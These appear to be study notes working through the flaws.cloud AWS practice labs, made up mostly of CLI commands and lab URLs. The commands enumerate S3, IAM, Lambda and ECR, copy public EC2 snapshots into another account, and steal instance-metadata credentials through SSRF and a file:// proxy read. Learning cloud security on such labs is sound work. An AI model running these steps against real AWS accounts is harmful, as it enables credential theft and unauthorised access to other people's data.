2. AWS Enumeration Process

0. Steps

Google Dorking
Github Repos
Pivot from compromised computer with AWS Keys
Pivot from compromised AWS environment.

1. Step

dig +nocmd flaws.cloud any +multiline +noall +answer

dig <DNS>

nslookup <ip> 

aws s3 ls s3://flaws.cloud --no-sign-request

1.1 Attacking EC2

AWS allows you to make snapshots of EC2's and databases (RDS). Attack credentials in backups.

  1. Get credentials
  2. Get Account ID
aws --profile flaws sts get-caller-identity
  1. Get Snapshot and Volume info
    1. Snapshots go across regions
    2. Volume stays in the same region as the snapshot.
aws --profile mine ec2 describe-snapshots --owner-id 975426262029
  1. Get Permission info
aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws
  1. Create Volume in my account using the snapshot
 aws ec2 create-volume --availability-zone us-west-2c --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 --profile mine

1.2 Steal EC2 Metadata credential via SSRF

Metadata service can be access at the following addresses from EC2 instances using Instance Metadata Service (IMDS)

http://169.254.169.254/latest/meta-data/

http://[fd00:ec2::254]/latest/meta-data/

OR Try LFI
http://container.target.flaws2.cloud/proxy/file:///proc/self/environ

1.2.1 Steps

  1. Gather user info from IMDS
    https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/
# curl webaddress/proxy/IMDS
e.g. 
curl 
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/

169.254.170.2/v2/credentials/

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/
ALSO try

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/*role_name*/
  1. Create profile
> aws configure --profile <new user>
> aws configure set aws_session_token <SESSIONTOKENHERE>

## Update profiles
~/.aws/credentials

## Access the hidden folder
aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile flaws5

1.3 Custom Policy

# Create a target user
$ aws configure --profile <new user>

# Check user
aws --profile <new user> iam get-user

# Check user policy
aws --profile <new user> iam list-attached-user-policies --user-name Level6

OR 
cloudfox --> check permission.csv

# Get policy info and version info
aws --profile flaws6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

# View a specific version
aws --profile flaws6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
 ## Restapi indicates lambda


# get Lambda policy
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6



# List Lambda functions
aws --profile flaws6 lambda list-functions --region us-west-2

# Get the specific function info
aws --profile flaws6 lambda get-policy --region us-west-2 --function-name Level6

# OR Check cloudfox
resource-trusts or lambda

# Based on the previous command, s33ppypa75 is restapi ID.
"Resource": "arn:aws:apigateway:us-west-2::/restapis/*"   

arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}

# Search for other policy
aws --profile flaws6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"

ARN = Amazon Resource Names
https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html

arn:partition:service:region:account-id:resource-type/resource-id

1.4 Credentials

EC2 : Metadata service 169.254.169.254
Lambda : Environment variables

1.5 Elastic Container Registry (ECR)

Amazon Elastic Container Registry (Amazon ECR) is a fully managed container registry offering high-performance hosting, so you can reliably deploy application images and artifacts anywhere.

$  aws ecr help

$  aws sts get-caller-identity --profile flaws2

$ aws ecr describe-images --profile flaws2 --repository-name level2

$ aws ecr list-images --profile flaws2 --repository-name level2 

$ aws ecr list-images --repository-name level2 --registry-id 653711331788


OPTION1 Docker
aws ecr get-login-password --profile <user>

docker login -u AWS -p eyJwYXlsb2FkIjoibzB..U5ODU5fQ==  https://653711331788.dkr.ecr.us-east-1.amazonaws.com

docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest

or docker image ls
 --> docker inspect <Image ID>
docker image history <image ID> --no-trunc




OPTION2 AWS CLI
 aws sts get-caller-identity --profile flaws2



aws ecr batch-get-image --repository-name level2 --registry-id 653711331788 --image-ids imageTag=latest --profile flaws2|jq '.images[].imageManifest|fromjson'


aws ecr get-download-url-for-layer --repository-name level2 --layer-digest "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621" --profile flaws2

2. Tools

AWS -Tools